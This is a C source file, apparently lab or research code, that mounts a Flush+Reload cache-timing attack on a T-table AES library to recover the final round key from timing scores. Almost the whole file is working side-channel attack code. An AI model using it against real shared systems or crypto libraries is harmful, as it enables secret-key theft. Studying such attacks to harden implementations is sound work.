#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

#include "cache_low.h"
#include "cache_util.h"

// Possible macros:
// - WITH_PROCESS_SINGLE
// - WITH_CACHE_FLUSH

// Only allow some special combination of macro
#if !defined(WITH_PROCESS_SINGLE) || !defined(WITH_CACHE_FLUSH)
#error Please check the macro used. For now, only single process + flush is a valid combination.
#endif


#ifdef WITH_PROCESS_SINGLE
#include "aes.h"
#endif //ifdef WITH_PROCESS_SINGLE

#define MAX_PLAINTEXTS 3000
#define MAX_CMD_SIZE 100
#define T_TABLE_ENTRIES 256

// Default size are in byte
// Block size for ciphertext and plaintext
#define AES_BLOCK_SIZE 16
#define AES128_KEY_SIZE 16
#define CACHE_LINE_SIZE 64

// Possibilities in one byte
#define KEY_BYTE_CANDIDATE 256

// Elements of 32 bits (4 byte), each cache line can contains 16 T-table elements
#define ELEMENT_PER_CACHE_LINE 16
#define CACHE_LINE_IN_T_TABLE 16

struct attack_ctx {
  uint16_t plaintext_cnt;
  uint16_t threshold;
  uint32_t *addr_te[4];
  //char plaintexts[MAX_PLAINTEXTS][AES_BLOCK_SIZE*2+1];
  uint8_t plaintexts[MAX_PLAINTEXTS][AES_BLOCK_SIZE];
  uint16_t score[AES128_KEY_SIZE][T_TABLE_ENTRIES];
  uint8_t predict_key[AES128_KEY_SIZE];
};


void printhex_uint8(uint8_t *buffer, size_t size) {
  for(int i = 0; i < size; i++)
    printf("%02x", buffer[i]);
  printf("\n");
}

int prepare_ctx(int argc, char **argv, struct attack_ctx *ctx) {

  // Read arguments
  if (argc != 7) {
    printf("Wrong numbers of arguments.\n");
    printf("Usage %s <offset_te0> <offset_te1> <offset_te2> <offset_te3> <plaintext_cnt> <threshold>\n", argv[0]);
  }

  uint32_t offset_te0 = strtoul(argv[1], NULL, 16);
  uint32_t offset_te1 = strtoul(argv[2], NULL, 16);
  uint32_t offset_te2 = strtoul(argv[3], NULL, 16);
  uint32_t offset_te3 = strtoul(argv[4], NULL, 16);

  ctx->plaintext_cnt = strtoul(argv[5], NULL, 0);
  ctx->threshold = strtoul(argv[6], NULL, 0);
  printf("DEBUG: ctx->plaintext_cnt %u\n", ctx->plaintext_cnt);
  printf("DEBUG: ctx->threshold %u\n", ctx->threshold);

  // Map library
  const char* lib_filename = "libaes.so";
  ctx->addr_te[0] = (uint32_t *) map_offset(lib_filename, offset_te0);
  ctx->addr_te[1] = (uint32_t *) map_offset(lib_filename, offset_te1);
  ctx->addr_te[2] = (uint32_t *) map_offset(lib_filename, offset_te2);
  ctx->addr_te[3] = (uint32_t *) map_offset(lib_filename, offset_te3);

  printf("DEBUG: ctx->addr_te %p %p %p %p\n", ctx->addr_te[0], ctx->addr_te[1], ctx->addr_te[2], ctx->addr_te[3]);

  // Read plaintext file
  FILE *fp = fopen("plaintext.txt", "r");
  if (fp == NULL) {
    printf("Could not open file plaintext.txt\n");
    return -1;
  }

  int plaintext_cnt;

  fscanf(fp, "%d\n", &plaintext_cnt);
  if (plaintext_cnt > ctx->plaintext_cnt) {
    plaintext_cnt = ctx->plaintext_cnt;
  }
  if (plaintext_cnt < ctx->plaintext_cnt) {
    ctx->plaintext_cnt = plaintext_cnt;
  }
  printf("Total plaintext: %d\n", plaintext_cnt);

  uint8_t plaintext[AES_BLOCK_SIZE*2+1] = {0,};
  for(int i=0; i<plaintext_cnt; i++) {
    fscanf(fp, "%s\n", plaintext);

    if(strlen(plaintext) != 32) {
      printf("Plaintext size not equals to 32.\n");
      return -1;
    }

    for (int j = 0; j < AES_BLOCK_SIZE; j++) {
      sscanf(&plaintext[j*2], "%2hhx", &ctx->plaintexts[i][j]);
    }
  }
  fclose(fp);

  return 0;
}

int finalize_ctx(struct attack_ctx *ctx) {
  unmap_offset(ctx->addr_te[0]);
  unmap_offset(ctx->addr_te[1]);
  unmap_offset(ctx->addr_te[2]);
  unmap_offset(ctx->addr_te[3]);
}

/*
 * Useful record combinations
 *
 * te2 ==> i = 0, 4, 8, 12
 * te3 ==> i = 1, 5, 9, 13
 * te0 ==> i = 2, 6, 10, 14
 * te1 ==> i = 3, 7, 11, 15
 */
static inline int is_useful_record(int te, int aes_key_byte_i)
{
  return (((te + 2) % 4) == (aes_key_byte_i % 4));
}

/* calcuate score */
static int calc_score(struct attack_ctx *ctx)
{
  int plaintext_cnt = ctx->plaintext_cnt;
  int threshold = ctx->threshold;

#ifdef WITH_PROCESS_SINGLE
  uint8_t aes_user_key[16]        = {0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c};
  AES_KEY aes_key;
  // Initialize AES function
  printf("AES_set_encrypt_key\n");
  if (AES_set_encrypt_key(aes_user_key, 128, &aes_key) < 0) {
    printf("AES_set_encrypt_key error.\n");
    return 1;
  }

  printf("AES round 10 key: %08x %08x %08x %08x\n", aes_key.rd_key[40], aes_key.rd_key[41], aes_key.rd_key[42], aes_key.rd_key[43]); // DEBUG
#endif //ifdef WITH_PROCESS_SINGLE

  // Initialize score array
  memset(ctx->score, 0, sizeof(ctx->score));

  void *addr;
  uint8_t ciphertext[AES_BLOCK_SIZE];
  uint16_t access_table_s[4][CACHE_LINE_IN_T_TABLE];    /* access table for Te0, Te1, Te2, Te3 */
  char cmd[MAX_CMD_SIZE];
  FILE *fp;

  // For each plaintext
  for(int p = 0; p < plaintext_cnt; p++) {
    // Initialize access array
    memset(access_table_s, 0, sizeof(access_table_s));
    printf("plaintext:");
    printhex_uint8(ctx->plaintexts[p], AES_BLOCK_SIZE);

    // Work through all T Tables and all possible cache lines
    for(int te = 0; te <= 3; te++) {
      //printf("DEBUG: Access table Te%d:\n", te);

      for(int s = 0; s < CACHE_LINE_IN_T_TABLE; s ++) {
        // Compute target cache line addr
        addr = ctx->addr_te[te] + s*ELEMENT_PER_CACHE_LINE;

#ifdef WITH_CACHE_FLUSH
        //printf("DEBUG: Flushing addr %p\n", addr);
        clflush(addr);
#endif //ifdef WITH_CACHE_FLUSH

        // Encryption
#ifdef WITH_PROCESS_SINGLE
        AES_encrypt(ctx->plaintexts[p], ciphertext, &aes_key);
#endif //ifdef WITH_PROCESS_SINGLE
        /*
        sprintf(cmd, "LD_LIBRARY_PATH=. ./victim.elf %s", ctx->plaintexts[p]);
        fp = popen(cmd, "r");

        // The use of fp needs to be before memaccesstime, else the compiler may choose to executes memaccess first
        // perhaps use mfence could help?
        if (fp == NULL) {
          printf("popen failed.\n");
          return -1;
        }
        for (int i = 0; i < AES_BLOCK_SIZE; i++) {
          fscanf(fp, "%2hhx", &ciphertext[i]);
        }
        pclose(fp);
        */

        // Analyze cache state
        uint16_t count = memaccesstime_u16(addr);
        access_table_s[te][s] = count < threshold? 0 : 1;
      } // end for s

      //printf("\n"); // DEBUG
    } // end for te

    printf("ciphertext:");
    printhex_uint8(ciphertext, AES_BLOCK_SIZE);

    // For each access table, increase candidate byte score
    for(int i = 0; i < AES128_KEY_SIZE; i++) { // For all Ki
      for(int te = 0; te <= 3; te++) { // For each Te Table
        if (is_useful_record(te, i) == 1) {
          //printf("DEBUG: useful record Te%d, i=%d\n", te, i);
          //printf("C: %02x (", ciphertext[i]); //DEBUG

          // For each accessed cache line, increase corresponding key byte candidate score
          for(int s = 0; s < CACHE_LINE_IN_T_TABLE; s++) {
            if(access_table_s[te][s] > 0) {// == 1) {
              //printf("%2d ", s); //DEBUG
              addr = ctx->addr_te[te] + s*ELEMENT_PER_CACHE_LINE;
              uint32_t *val_word_ptr = (unsigned int*)addr;

              // Increase candidate score for all elements in the given cache line
              for (int offset = 0; offset < ELEMENT_PER_CACHE_LINE; offset++) {
                // printf("DEBUG: val_word_ptr %p\n", val_word_ptr);
                uint8_t val = ((uint8_t*)val_word_ptr)[3 - i%4];
                ctx->score[i][ciphertext[i] ^ val] += access_table_s[te][s];  /* increase candidate score!! */
                //printf("%02x:%02x ", val, ciphertext[i] ^ val); // DEBUG
                // Note: ciphertext XOR T[x] = KEY, val is taking the 1x value of SBox
                val_word_ptr ++; // next u32 element
              }
            }
          }

          //printf(")\n"); //DEBUG
        } // endif is_useful_record
      }
    }

    /* 5. Print progress */
    if(p % 20 == 0)
      printf("progress : %d / %d\n", p, plaintext_cnt);
  }

  return 0;
}

/* predict last round key by final score!! */
static void find_last_round_key_by_score(struct attack_ctx *ctx)
{
  unsigned int best = 0;
  uint32_t min = UINT32_MAX;

  printf("DEBUG: score array:\n");

  // for each byte in the key
  for(int ki = 0; ki < AES128_KEY_SIZE; ki++) {
    min = UINT32_MAX;
    best = 0;

    // for score of each candidate byte for the given byte
    for(int kbyte=0; kbyte<KEY_BYTE_CANDIDATE; kbyte++) {
      printf("%02x:%6d ",kbyte , ctx->score[ki][kbyte]); // DEBUG
      if(ctx->score[ki][kbyte] < min) {
        min = ctx->score[ki][kbyte];
        best = kbyte;
      }
    }

    ctx->predict_key[ki] = best;
    printf("best %d at 0x%02x\n", min, best); // DEBUG
  }

  printf("predict last round key : ");
  printhex_uint8(ctx->predict_key, sizeof(ctx->predict_key));
}

// Attacker takes the offset of Te0, Te1, Te2, Te3
int main(int argc, char **argv) {

  struct attack_ctx ctx;

  // Check and read args
  if (prepare_ctx(argc, argv, &ctx) < 0) {
    return 1;
  }

  // Attack
  if (calc_score(&ctx) < 0) {
    return 1;
  }

  find_last_round_key_by_score(&ctx);

  // Clean resources: unmap library...
  finalize_ctx(&ctx);

  return 0;
}